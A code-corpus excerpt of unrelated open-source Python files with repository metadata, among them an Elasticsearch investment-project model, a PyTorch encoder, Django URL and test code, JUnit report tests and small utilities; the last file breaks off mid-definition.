max_issues: path datahub/search/investment/models.py | repo alixedi/data-hub-api-cd-poc @ a5e5ea45bb496c0d2a06635864514af0c7d4291a | licenses ["MIT"] | count 16 | events 2020-04-01T15:25:35.000Z to 2020-04-14T14:07:30.000Z
max_forks: path datahub/search/investment/models.py | repo alixedi/data-hub-api-cd-poc @ a5e5ea45bb496c0d2a06635864514af0c7d4291a | licenses ["MIT"] | count null | events null
content:
from elasticsearch_dsl import Boolean, Date, Double, Integer, Keyword, Long, Object, Text
from datahub.search import dict_utils
from datahub.search import fields
from datahub.search.models import BaseESModel
DOC_TYPE = 'investment_project'
def _related_investment_project_field():
"""Field for a related investment project."""
return Object(properties={
'id': Keyword(),
'name': fields.NormalizedKeyword(),
'project_code': fields.NormalizedKeyword(),
})
class InvestmentProject(BaseESModel):
"""Elasticsearch representation of InvestmentProject."""
id = Keyword()
actual_land_date = Date()
actual_uk_regions = fields.id_name_field()
address_1 = Text()
address_2 = Text()
address_town = fields.NormalizedKeyword()
address_postcode = Text()
approved_commitment_to_invest = Boolean()
approved_fdi = Boolean()
approved_good_value = Boolean()
approved_high_value = Boolean()
approved_landed = Boolean()
approved_non_fdi = Boolean()
allow_blank_estimated_land_date = Boolean(index=False)
allow_blank_possible_uk_regions = Boolean(index=False)
anonymous_description = fields.EnglishText()
archived = Boolean()
archived_by = fields.contact_or_adviser_field()
archived_on = Date()
archived_reason = Text()
associated_non_fdi_r_and_d_project = _related_investment_project_field()
average_salary = fields.id_name_field()
business_activities = fields.id_name_field()
client_cannot_provide_foreign_investment = Boolean()
client_cannot_provide_total_investment = Boolean()
client_contacts = fields.contact_or_adviser_field()
client_relationship_manager = fields.contact_or_adviser_field(include_dit_team=True)
client_requirements = Text(index=False)
comments = fields.EnglishText()
country_investment_originates_from = fields.id_name_field()
country_lost_to = Object(
properties={
'id': Keyword(index=False),
'name': Text(index=False),
},
)
created_on = Date()
created_by = fields.contact_or_adviser_field(include_dit_team=True)
date_abandoned = Date()
date_lost = Date()
delivery_partners = fields.id_name_field()
description = fields.EnglishText()
estimated_land_date = Date()
export_revenue = Boolean()
fdi_type = fields.id_name_field()
fdi_value = fields.id_name_field()
foreign_equity_investment = Double()
government_assistance = Boolean()
intermediate_company = fields.id_name_field()
investor_company = fields.id_name_partial_field()
investor_company_country = fields.id_name_field()
investment_type = fields.id_name_field()
investor_type = fields.id_name_field()
level_of_involvement = fields.id_name_field()
likelihood_to_land = fields.id_name_field()
project_assurance_adviser = fields.contact_or_adviser_field(include_dit_team=True)
project_manager = fields.contact_or_adviser_field(include_dit_team=True)
name = Text(
fields={
'keyword': fields.NormalizedKeyword(),
'trigram': fields.TrigramText(),
},
)
new_tech_to_uk = Boolean()
non_fdi_r_and_d_budget = Boolean()
number_new_jobs = Integer()
number_safeguarded_jobs = Long()
modified_on = Date()
project_arrived_in_triage_on = Date()
project_code = fields.NormalizedKeyword(
fields={
'trigram': fields.TrigramText(),
},
)
proposal_deadline = Date()
other_business_activity = Text(index=False)
quotable_as_public_case_study = Boolean()
r_and_d_budget = Boolean()
reason_abandoned = Text(index=False)
reason_delayed = Text(index=False)
reason_lost = Text(index=False)
referral_source_activity = fields.id_name_field()
referral_source_activity_event = fields.NormalizedKeyword()
referral_source_activity_marketing = fields.id_name_field()
referral_source_activity_website = fields.id_name_field()
referral_source_adviser = Object(
properties={
'id': Keyword(index=False),
'first_name': Text(index=False),
'last_name': Text(index=False),
'name': Text(index=False),
},
)
sector = fields.sector_field()
site_decided = Boolean()
some_new_jobs = Boolean()
specific_programme = fields.id_name_field()
stage = fields.id_name_field()
status = fields.NormalizedKeyword()
team_members = fields.contact_or_adviser_field(include_dit_team=True)
total_investment = Double()
uk_company = fields.id_name_partial_field()
uk_company_decided = Boolean()
uk_region_locations = fields.id_name_field()
will_new_jobs_last_two_years = Boolean()
level_of_involvement_simplified = Keyword()
gross_value_added = Double()
MAPPINGS = {
'actual_uk_regions': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
'archived_by': dict_utils.contact_or_adviser_dict,
'associated_non_fdi_r_and_d_project': dict_utils.investment_project_dict,
'average_salary': dict_utils.id_name_dict,
'business_activities': lambda col: [dict_utils.id_name_dict(c) for c in col.all()],
'client_contacts': lambda col: [dict_utils.contact_or_adviser_dict(c) for c in col.all()],
'client_relationship_manager': dict_utils.adviser_dict_with_team,
'country_lost_to': dict_utils.id_name_dict,
'country_investment_originates_from': dict_utils.id_name_dict,
'created_by': dict_utils.adviser_dict_with_team,
'delivery_partners': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
'fdi_type': dict_utils.id_name_dict,
'fdi_value': dict_utils.id_name_dict,
'intermediate_company': dict_utils.id_name_dict,
'investment_type': dict_utils.id_name_dict,
'investor_company': dict_utils.id_name_dict,
'investor_company_country': dict_utils.id_name_dict,
'investor_type': dict_utils.id_name_dict,
'level_of_involvement': dict_utils.id_name_dict,
'likelihood_to_land': dict_utils.id_name_dict,
'project_assurance_adviser': dict_utils.adviser_dict_with_team,
'project_code': str,
'project_manager': dict_utils.adviser_dict_with_team,
'referral_source_activity': dict_utils.id_name_dict,
'referral_source_activity_marketing': dict_utils.id_name_dict,
'referral_source_activity_website': dict_utils.id_name_dict,
'referral_source_adviser': dict_utils.contact_or_adviser_dict,
'sector': dict_utils.sector_dict,
'specific_programme': dict_utils.id_name_dict,
'stage': dict_utils.id_name_dict,
'team_members': lambda col: [
dict_utils.contact_or_adviser_dict(c.adviser, include_dit_team=True) for c in col.all()
],
'uk_company': dict_utils.id_name_dict,
'uk_region_locations': lambda col: [
dict_utils.id_name_dict(c) for c in col.all()
],
}
SEARCH_FIELDS = (
'id',
'name',
'name.trigram',
'uk_company.name',
'uk_company.name.trigram',
'investor_company.name',
'investor_company.name.trigram',
'project_code.trigram',
)
class Meta:
"""Default document meta data."""
doc_type = DOC_TYPE
class Index:
doc_type = DOC_TYPE
avg_line_length: 38.417526 | max_line_length: 99 | alphanum_fraction: 0.70106 | count_classes: 6,955 | score_classes: 0.933181 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,047 | score_documentation: 0.14048

hexsha: 42b106aaf54e3b2c19e17572d5a63e648baf43b4 | size: 1,670 | ext: py | lang: Python
max_stars: path robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py | repo Dreem-Organization/RobustSleepNet @ c8ff3f6f857299eb2bf2e9400483084d5ecd4106 | licenses ["MIT"] | count 16 | events 2021-04-06T14:04:45.000Z to 2022-03-11T14:37:08.000Z
max_issues: path robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py | repo Dreem-Organization/RobustSleepNet @ c8ff3f6f857299eb2bf2e9400483084d5ecd4106 | licenses ["MIT"] | count null | events null
max_forks: path robust_sleep_net/models/modulo_net/features_encoder/fully_connected.py | repo Dreem-Organization/RobustSleepNet @ c8ff3f6f857299eb2bf2e9400483084d5ecd4106 | licenses ["MIT"] | count 4 | events 2021-06-10T06:48:33.000Z to 2022-03-26T22:29:07.000Z
content:
from collections import OrderedDict
import torch
from torch import nn
class FullyConnected(nn.Module):
def __init__(self, features, layers=None, dropout=0.0):
super(FullyConnected, self).__init__()
print("Layers:", layers)
input_channels = 0
for feature in features:
input_channels += features[feature]["shape"][0]
self.dropout = nn.Dropout(dropout)
if isinstance(layers, list):
self.layers = nn.ModuleList(
[
nn.Sequential(
OrderedDict(
[
(
"linear_{}".format(i),
nn.Linear(
in_features=input_channels if i == 0 else layers[i - 1],
out_features=n_dim,
),
),
("relu_{}".format(i), nn.ReLU()),
]
)
)
for i, n_dim in enumerate(layers)
]
)
self.out_features = layers[-1]
elif layers is None:
self.layers = [nn.Identity()]
self.out_features = input_channels
def forward(self, x):
features = []
for feature in x:
features += [x[feature]]
features = torch.cat(features, -1)
for layer in self.layers:
features = self.dropout(features)
features = layer(features)
return features
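A short usage sketch for the encoder above; the feature names, channel counts, batch size, and layer widths are made-up illustrations, and the features dict follows the {"shape": [channels, ...]} convention the constructor reads:

```python
import torch

# Hypothetical feature spec: two named feature groups with 8 and 4 channels.
features = {
    "eeg": {"shape": [8]},
    "accelerometer": {"shape": [4]},
}
encoder = FullyConnected(features, layers=[64, 32], dropout=0.1)

# One batch of 16 samples per feature group, channels on the last axis.
batch = {
    "eeg": torch.randn(16, 8),
    "accelerometer": torch.randn(16, 4),
}
out = encoder(batch)
print(out.shape)             # torch.Size([16, 32])
print(encoder.out_features)  # 32
```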
avg_line_length: 32.115385 | max_line_length: 96 | alphanum_fraction: 0.426946 | count_classes: 1,596 | score_classes: 0.955689 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 36 | score_documentation: 0.021557

hexsha: 35e91cbc49c53f3ff38da3a05748e14783d919ce | size: 2,968 | ext: py | lang: Python
max_stars: path data/rawdata_dataset.py | repo weiyw16/pytorch-CycleGAN-and-pix2pix @ 432a91ee6ca8dc606ba0116b27b0948abc48f295 | licenses ["BSD-3-Clause"] | count null | events null
max_issues: path data/rawdata_dataset.py | repo weiyw16/pytorch-CycleGAN-and-pix2pix @ 432a91ee6ca8dc606ba0116b27b0948abc48f295 | licenses ["BSD-3-Clause"] | count null | events null
max_forks: path data/rawdata_dataset.py | repo weiyw16/pytorch-CycleGAN-and-pix2pix @ 432a91ee6ca8dc606ba0116b27b0948abc48f295 | licenses ["BSD-3-Clause"] | count null | events null
content:
#import
import os
#import torch
#import torch.nn as nn
import torch.utils.data as Data
#import torchvision
import matplotlib.pyplot as plt
import h5py
#from torch.autograd import Variable
import numpy as np
import torch
class rawdataDataset(Data.Dataset):
def __init__(self):
super(rawdataDataset, self).__init__()
#def __init__(self, filename, root_dir, transform=None):
# self.frame = h5py.File(root_dir + filename, 'r')
# self.root_dir = root_dir
# self.transform = transform
def name(self):
return 'rawdataDataset'
@staticmethod
def modify_commandline_options(parser, is_train):
return parser
def initialize(self, opt):
self.opt = opt
self.root = opt.dataroot
self.dir_AB = os.path.join(opt.dataroot, opt.phase) # phase: train test
#self.AB_paths = sorted(make_dataset(self.dir_AB))
self.A_paths = self.dir_AB + "/A.h5"
self.B_paths = self.dir_AB + "/B.h5"
self.frameA = h5py.File(self.A_paths, 'r')
self.frameB = h5py.File(self.B_paths, 'r')
#assert(opt.resize_or_crop == 'resize_and_crop')
def __len__(self):
return len(self.frameA)
def __getitem__(self, index):
#img_name = torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
#img_name = Variable(torch.FloatTensor([[ self.frame["pic" + str(index)] ]])
A = self.frameA["A" + str(index + 1)]
B = self.frameB["B" + str(index + 1)]
#A = torch.FloatTensor([[ self.frameA["A" + str(index)] ]])
#B = torch.FloatTensor([[ self.frameB["B" + str(index)] ]])
#AB_path = self.AB_paths[index]
#AB = Image.open(AB_path).convert('RGB')
#w, h = AB.size
#w2 = int(w / 2)
#A = AB.crop((0, 0, w2, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#B = AB.crop((w2, 0, w, h)).resize((self.opt.loadSize, self.opt.loadSize), Image.BICUBIC)
#A = transforms.ToTensor()(A)
#B = transforms.ToTensor()(B)
#w_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#h_offset = random.randint(0, max(0, self.opt.loadSize - self.opt.fineSize - 1))
#A = A[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#B = B[:, h_offset:h_offset + self.opt.fineSize, w_offset:w_offset + self.opt.fineSize]
#A = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(A)
#B = transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))(B)
if self.opt.which_direction == 'BtoA':
input_nc = self.opt.output_nc
output_nc = self.opt.input_nc
else:
input_nc = self.opt.input_nc
output_nc = self.opt.output_nc
#return img_name
return {'A' : A, 'B' : B, 'A_paths' : self.A_paths, 'B_paths' : self.B_paths}
#%hist -f rawdata_dataset.py
avg_line_length: 38.545455 | max_line_length: 97 | alphanum_fraction: 0.597035 | count_classes: 2,718 | score_classes: 0.915768 | count_generators: 0 | score_generators: 0 | count_decorators: 89 | score_decorators: 0.029987 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,561 | score_documentation: 0.525943

hexsha: 35eca7541efb5afc537b44ba4b6a0fc5cf5a30dd | size: 310 | ext: py | lang: Python
max_stars: path pythons/pythons/pythons_app/urls.py | repo BoyanPeychinov/python_web_framework @ bb3a78c36790821d8b3a2b847494a1138d063193 | licenses ["MIT"] | count null | events null
max_issues: path pythons/pythons/pythons_app/urls.py | repo BoyanPeychinov/python_web_framework @ bb3a78c36790821d8b3a2b847494a1138d063193 | licenses ["MIT"] | count null | events null
max_forks: path pythons/pythons/pythons_app/urls.py | repo BoyanPeychinov/python_web_framework @ bb3a78c36790821d8b3a2b847494a1138d063193 | licenses ["MIT"] | count null | events null
content:
from django.urls import path
from . import views
from .views import IndexView
urlpatterns = [
# path('', views.index, name="index"),
path('', IndexView.as_view(), name="index"),
# path('create/', views.create, name="create"),
path('create/', views.PythonCreateView.as_view(), name="create"),
]
avg_line_length: 31 | max_line_length: 69 | alphanum_fraction: 0.66129 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 111 | score_documentation: 0.358065

hexsha: 35ed1f868aeb38f0c96a30ed7f9536e255837e20 | size: 356 | ext: py | lang: Python
max_stars: path tests/python/text_utility.py | repo Noxsense/mCRL2 @ dd2fcdd6eb8b15af2729633041c2dbbd2216ad24 | licenses ["BSL-1.0"] | count 61 | events 2018-05-24T13:14:05.000Z to 2022-03-29T11:35:03.000Z
max_issues: path tests/python/text_utility.py | repo Noxsense/mCRL2 @ dd2fcdd6eb8b15af2729633041c2dbbd2216ad24 | licenses ["BSL-1.0"] | count 229 | events 2018-05-28T08:31:09.000Z to 2022-03-21T11:02:41.000Z
max_forks: path tests/python/text_utility.py | repo Noxsense/mCRL2 @ dd2fcdd6eb8b15af2729633041c2dbbd2216ad24 | licenses ["BSL-1.0"] | count 28 | events 2018-04-11T14:09:39.000Z to 2022-02-25T15:57:39.000Z
content:
#~ Copyright 2014 Wieger Wesselink.
#~ Distributed under the Boost Software License, Version 1.0.
#~ (See accompanying file LICENSE_1_0.txt or http://www.boost.org/LICENSE_1_0.txt)
def read_text(filename):
with open(filename, 'r') as f:
return f.read()
def write_text(filename, text):
with open(filename, 'w') as f:
f.write(text)
avg_line_length: 29.666667 | max_line_length: 82 | alphanum_fraction: 0.691011 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 184 | score_documentation: 0.516854

hexsha: 35ed5dd8d0b8879efae47e20f5661656b1666fbb | size: 159 | ext: py | lang: Python
max_stars: path Dumper/temp.py | repo NeerajGulia/kafka-monitor @ cfcd39a37d22c86d3cebffe289687a030bb84353 | licenses ["Apache-2.0"] | count null | events null
max_issues: path Dumper/temp.py | repo NeerajGulia/kafka-monitor @ cfcd39a37d22c86d3cebffe289687a030bb84353 | licenses ["Apache-2.0"] | count null | events null
max_forks: path Dumper/temp.py | repo NeerajGulia/kafka-monitor @ cfcd39a37d22c86d3cebffe289687a030bb84353 | licenses ["Apache-2.0"] | count null | events null
content:
import datetime
t1 = datetime.datetime(2019, 3, 9, 10, 55, 30, 991882)
t2 = datetime.datetime(2019, 3, 10, 10, 55, 30, 991882)
print((t2-t1).total_seconds())
avg_line_length: 26.5 | max_line_length: 55 | alphanum_fraction: 0.685535 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 0 | score_documentation: 0

hexsha: 35ee497682f551e6df5ef747e053a1c6578b24fe | size: 1,401 | ext: py | lang: Python
max_stars: path listools/llogic/is_descending.py | repo jgarte/listools @ 17ef56fc7dde701890213f248971d8dc7a6e6b7c | licenses ["MIT"] | count 2 | events 2019-01-22T03:50:43.000Z to 2021-04-22T16:12:17.000Z
max_issues: path listools/llogic/is_descending.py | repo jgarte/listools @ 17ef56fc7dde701890213f248971d8dc7a6e6b7c | licenses ["MIT"] | count 2 | events 2019-01-22T03:57:49.000Z to 2021-04-22T22:03:47.000Z
max_forks: path listools/llogic/is_descending.py | repo jgarte/listools @ 17ef56fc7dde701890213f248971d8dc7a6e6b7c | licenses ["MIT"] | count 1 | events 2021-04-22T21:13:00.000Z to 2021-04-22T21:13:00.000Z
content:
def is_descending(input_list: list, step: int = -1) -> bool:
r"""llogic.is_descending(input_list[, step])
This function returns True if the input list is descending with a fixed
step, otherwise it returns False. Usage:
>>> alist = [3, 2, 1, 0]
>>> llogic.is_descending(alist)
True
The final value can be other than zero:
>>> alist = [12, 11, 10]
>>> llogic.is_descending(alist)
True
The list can also have negative elements:
>>> alist = [2, 1, 0, -1, -2]
>>> llogic.is_descending(alist)
True
    It will return False if the list is not descending:
>>> alist = [6, 5, 9, 2]
>>> llogic.is_descending(alist)
False
    By default, the function uses steps of size -1, so the list below is not
    considered descending:
>>> alist = [7, 5, 3, 1]
>>> llogic.is_descending(alist)
False
    But the user can set the step argument to any negative value:
>>> alist = [7, 5, 3, 1]
>>> step = -2
>>> llogic.is_descending(alist, step)
True
"""
if not isinstance(input_list, list):
raise TypeError('\'input_list\' must be \'list\'')
if not isinstance(step, int):
raise TypeError('\'step\' must be \'int\'')
    if step >= 0:
        raise ValueError('\'step\' must be < 0')
aux_list = list(range(max(input_list), min(input_list)-1, step))
return input_list == aux_list
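A quick way to exercise the documented behaviour with the function defined above; the concrete lists mirror the docstring examples:

```python
assert is_descending([3, 2, 1, 0])
assert is_descending([12, 11, 10])
assert is_descending([2, 1, 0, -1, -2])
assert not is_descending([6, 5, 9, 2])
assert not is_descending([7, 5, 3, 1])       # default step of -1
assert is_descending([7, 5, 3, 1], step=-2)  # explicit larger step
print("all docstring examples behave as documented")
```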
avg_line_length: 27.470588 | max_line_length: 75 | alphanum_fraction: 0.608851 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 1,061 | score_documentation: 0.757316

hexsha: 35ef2ec3e738f6a7d680ddbb0d8cfed8a80181c4 | size: 384 | ext: py | lang: Python
max_stars: path blazer/hpc/local/__init__.py | repo radiantone/blazer @ 4f369729a72a397a5a472f081002bf24cf22b69c | licenses ["CC0-1.0"] | count 4 | events 2022-02-11T13:37:03.000Z to 2022-02-26T00:25:13.000Z
max_issues: path blazer/hpc/local/__init__.py | repo radiantone/blazer @ 4f369729a72a397a5a472f081002bf24cf22b69c | licenses ["CC0-1.0"] | count null | events null
max_forks: path blazer/hpc/local/__init__.py | repo radiantone/blazer @ 4f369729a72a397a5a472f081002bf24cf22b69c | licenses ["CC0-1.0"] | count null | events null
content:
from functools import partial
from pipe import select, where
from pydash import chunk
from pydash import filter_ as filter
from pydash import flatten, get, omit
from .primitives import parallel, pipeline, scatter
__all__ = (
"parallel",
"scatter",
"pipeline",
"partial",
"select",
"where",
"flatten",
"chunk",
"omit",
"get",
"filter",
)
avg_line_length: 16.695652 | max_line_length: 51 | alphanum_fraction: 0.648438 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 88 | score_documentation: 0.229167

hexsha: 35f130f559ed7cd7af033555dccc66ba4d2035c4 | size: 304 | ext: py | lang: Python
max_stars: path resumebuilder/resumebuilder.py | repo kinshuk4/ResumeBuilder @ 2c997f73b522c0668f3a66afb372bd91c6408b3c | licenses ["MIT"] | count 1 | events 2020-01-04T05:54:19.000Z to 2020-01-04T05:54:19.000Z
max_issues: path resumebuilder/resumebuilder.py | repo kinshuk4/ResumeBuilder @ 2c997f73b522c0668f3a66afb372bd91c6408b3c | licenses ["MIT"] | count null | events null
max_forks: path resumebuilder/resumebuilder.py | repo kinshuk4/ResumeBuilder @ 2c997f73b522c0668f3a66afb372bd91c6408b3c | licenses ["MIT"] | count null | events null
content:
import yaml
def yaml2dict(filename):
with open(filename, "r") as stream:
resume_dict = yaml.load(stream)
return resume_dict
def main():
resumeFile = "../demo/sample-resume.yaml"
resume_dict = yaml2dict(resumeFile)
print(resume_dict)
if __name__ == '__main__':
main()
avg_line_length: 17.882353 | max_line_length: 45 | alphanum_fraction: 0.664474 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 41 | score_documentation: 0.134868

hexsha: 35f16309c334902b0ed8ed87b8f07d61caa46a9a | size: 6,025 | ext: py | lang: Python
max_stars: path backend/tests/unittests/metric_source/test_report/junit_test_report_tests.py | repo ICTU/quality-report @ f6234e112228ee7cfe6476c2d709fe244579bcfe | licenses ["Apache-2.0"] | count 25 | events 2016-11-25T10:41:24.000Z to 2021-07-03T14:02:49.000Z
max_issues: path backend/tests/unittests/metric_source/test_report/junit_test_report_tests.py | repo ICTU/quality-report @ f6234e112228ee7cfe6476c2d709fe244579bcfe | licenses ["Apache-2.0"] | count 783 | events 2016-09-19T12:10:21.000Z to 2021-01-04T20:39:15.000Z
max_forks: path backend/tests/unittests/metric_source/test_report/junit_test_report_tests.py | repo ICTU/quality-report @ f6234e112228ee7cfe6476c2d709fe244579bcfe | licenses ["Apache-2.0"] | count 15 | events 2015-03-25T13:52:49.000Z to 2021-03-08T17:17:56.000Z
content:
"""
Copyright 2012-2019 Ministerie van Sociale Zaken en Werkgelegenheid
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import datetime
import unittest
from unittest.mock import Mock
import urllib.error
from dateutil.tz import tzutc, tzlocal
from hqlib.metric_source import JunitTestReport
class JunitTestReportTest(unittest.TestCase):
""" Unit tests for the Junit test report class. """
# pylint: disable=protected-access
def setUp(self):
self.__junit = JunitTestReport()
def test_test_report(self):
""" Test retrieving a Junit test report. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite tests="12" failures="2" errors="0" skipped="1" disabled="0">'
' <testcase><failure/></testcase>'
' <testcase><failure/></testcase>'
' </testsuite>'
'</testsuites>')
self.assertEqual(2, self.__junit.failed_tests('url'))
self.assertEqual(9, self.__junit.passed_tests('url'))
self.assertEqual(1, self.__junit.skipped_tests('url'))
def test_multiple_test_suites(self):
""" Test retrieving a Junit test report with multiple suites. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite tests="5" failures="1" errors="0" skipped="1" disabled="1">'
' <testcase><failure/><failure/></testcase>'
' </testsuite>'
' <testsuite tests="3" failures="1" errors="1" skipped="0" disabled="0">'
' <testcase><failure/></testcase>'
' </testsuite>'
'</testsuites>')
self.assertEqual(3, self.__junit.failed_tests('url'))
self.assertEqual(3, self.__junit.passed_tests('url'))
self.assertEqual(2, self.__junit.skipped_tests('url'))
def test_http_error(self):
""" Test that the default is returned when a HTTP error occurs. """
self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
self.assertEqual(-1, self.__junit.failed_tests('raise'))
self.assertEqual(-1, self.__junit.passed_tests('raise'))
self.assertEqual(-1, self.__junit.skipped_tests('raise'))
def test_missing_url(self):
""" Test that the default is returned when no urls are provided. """
self.assertEqual(-1, self.__junit.failed_tests())
self.assertEqual(-1, self.__junit.passed_tests())
self.assertEqual(-1, self.__junit.skipped_tests())
self.assertEqual(datetime.datetime.min, self.__junit.datetime())
def test_incomplete_xml(self):
""" Test that the default is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
self.assertEqual(-1, self.__junit.failed_tests('url'))
def test_faulty_xml(self):
""" Test incorrect XML. """
self.__junit._url_read = Mock(return_value='<testsuites><bla>')
self.assertEqual(-1, self.__junit.failed_tests('url'))
def test_datetime_with_faulty_xml(self):
""" Test incorrect XML. """
self.__junit._url_read = Mock(return_value='<testsuites><bla>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_report_datetime(self):
""" Test that the date and time of the test suite is returned. """
self.__junit._url_read = Mock(
return_value='<testsuites>'
' <testsuite name="Art" timestamp="2016-07-07T12:26:44">'
' </testsuite>'
'</testsuites>')
self.assertEqual(
datetime.datetime(2016, 7, 7, 12, 26, 44, tzinfo=tzutc()).astimezone(tzlocal()).replace(tzinfo=None),
self.__junit.datetime('url'))
def test_missing_report_datetime(self):
""" Test that the minimum datetime is returned if the url can't be opened. """
self.__junit._url_read = Mock(side_effect=urllib.error.HTTPError(None, None, None, None, None))
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_incomplete_xml_datetime(self):
""" Test that the minimum datetime is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites></testsuites>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_incomplete_xml_no_timestamp(self):
""" Test that the minimum datetime is returned when the xml is incomplete. """
self.__junit._url_read = Mock(return_value='<testsuites><testsuite></testsuite></testsuites>')
self.assertEqual(datetime.datetime.min, self.__junit.datetime('url'))
def test_urls(self):
""" Test that the urls point to the HTML versions of the reports. """
self.assertEqual(['http://server/html/htmlReport.html'],
self.__junit.metric_source_urls('http://server/junit/junit.xml'))
def test_url_regexp(self):
""" Test that the default regular expression to generate the HTML version of the urls can be changed. """
junit = JunitTestReport(metric_source_url_re="junit.xml$", metric_source_url_repl="junit.html")
self.assertEqual(['http://server/junit.html'], junit.metric_source_urls('http://server/junit.xml'))
avg_line_length: 47.81746 | max_line_length: 113 | alphanum_fraction: 0.64249 | count_classes: 5,249 | score_classes: 0.871203 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 2,486 | score_documentation: 0.412614

hexsha: 35f24e93301e26ad076b53b869df2630d390d615 | size: 965 | ext: py | lang: Python
max_stars: path lang/Python/compare-sorting-algorithms-performance-6.py | repo ethansaxenian/RosettaDecode @ 8ea1a42a5f792280b50193ad47545d14ee371fb7 | licenses ["MIT"] | count 1 | events 2018-11-09T22:08:38.000Z to 2018-11-09T22:08:38.000Z
max_issues: path lang/Python/compare-sorting-algorithms-performance-6.py | repo ethansaxenian/RosettaDecode @ 8ea1a42a5f792280b50193ad47545d14ee371fb7 | licenses ["MIT"] | count null | events null
max_forks: path lang/Python/compare-sorting-algorithms-performance-6.py | repo ethansaxenian/RosettaDecode @ 8ea1a42a5f792280b50193ad47545d14ee371fb7 | licenses ["MIT"] | count 1 | events 2018-11-09T22:08:40.000Z to 2018-11-09T22:08:40.000Z
content:
sort_functions = [
builtinsort, # see implementation above
insertion_sort, # see [[Insertion sort]]
insertion_sort_lowb, # ''insertion_sort'', where sequential search is replaced
# by lower_bound() function
qsort, # see [[Quicksort]]
qsortranlc, # ''qsort'' with randomly choosen ''pivot''
# and the filtering via list comprehension
qsortranpart, # ''qsortranlc'' with filtering via ''partition'' function
qsortranpartis, # ''qsortranpart'', where for a small input sequence lengths
] # ''insertion_sort'' is called
if __name__=="__main__":
import sys
sys.setrecursionlimit(10000)
write_timings(npoints=100, maxN=1024, # 1 <= N <= 2**10 an input sequence length
sort_functions=sort_functions,
sequence_creators = (ones, range, shuffledrange))
plot_timings()
avg_line_length: 50.789474 | max_line_length: 85 | alphanum_fraction: 0.598964 | count_classes: 0 | score_classes: 0 | count_generators: 0 | score_generators: 0 | count_decorators: 0 | score_decorators: 0 | count_async_functions: 0 | score_async_functions: 0 | count_documentation: 450 | score_documentation: 0.466321

hexsha: 35f445a5ba07dee2c2143db897f87a8a3259db16 | size: 6,300 | ext: py | lang: Python
max_stars: path server/organization/tests.py | repo NicholasNagy/ALTA @ ca07627481ee91f2969b0fc8e8f15e2a37b3e992 | licenses ["Apache-2.0"] | count 3 | events 2020-09-09T23:26:29.000Z to 2020-10-17T22:58:34.000Z
max_issues: path server/organization/tests.py | repo NicholasNagy/ALTA @ ca07627481ee91f2969b0fc8e8f15e2a37b3e992 | licenses ["Apache-2.0"] | count 294 | events 2020-09-27T17:20:50.000Z to 2021-06-23T01:44:09.000Z
max_forks: path server/organization/tests.py | repo NicholasNagy/ALTA @ ca07627481ee91f2969b0fc8e8f15e2a37b3e992 | licenses ["Apache-2.0"] | count 10 | events 2020-10-07T05:25:30.000Z to 2021-05-01T05:32:59.000Z
content:
from rest_framework import status
from rest_framework.test import APITestCase
from rest_framework.test import APIClient
from django.db.models import signals
import factory
from user_account.models import CustomUser
from .models import Organization
class OrganizationTestCase(APITestCase):
def setUp(self):
self.client = APIClient()
# Create each type of user
self.system_admin = CustomUser.objects.create(
user_name='system_admin1',
email='system_admin1@email.com',
password='password1',
first_name='system1',
last_name='admin1',
role='SA',
is_active=True)
self.inventory_manager = CustomUser.objects.create(
user_name='inventory_manager1',
email='inventory_manager1@email.com',
password='password1',
first_name='inventory1',
last_name='manager1',
role='IM',
is_active=True)
self.stock_keeper = CustomUser.objects.create(
user_name='stock_keeper1',
email='stock_keeper1@email.com',
password='password1',
first_name='inventory1',
last_name='keeper1',
role='SK',
is_active=True)
@factory.django.mute_signals(signals.pre_save, signals.post_save)
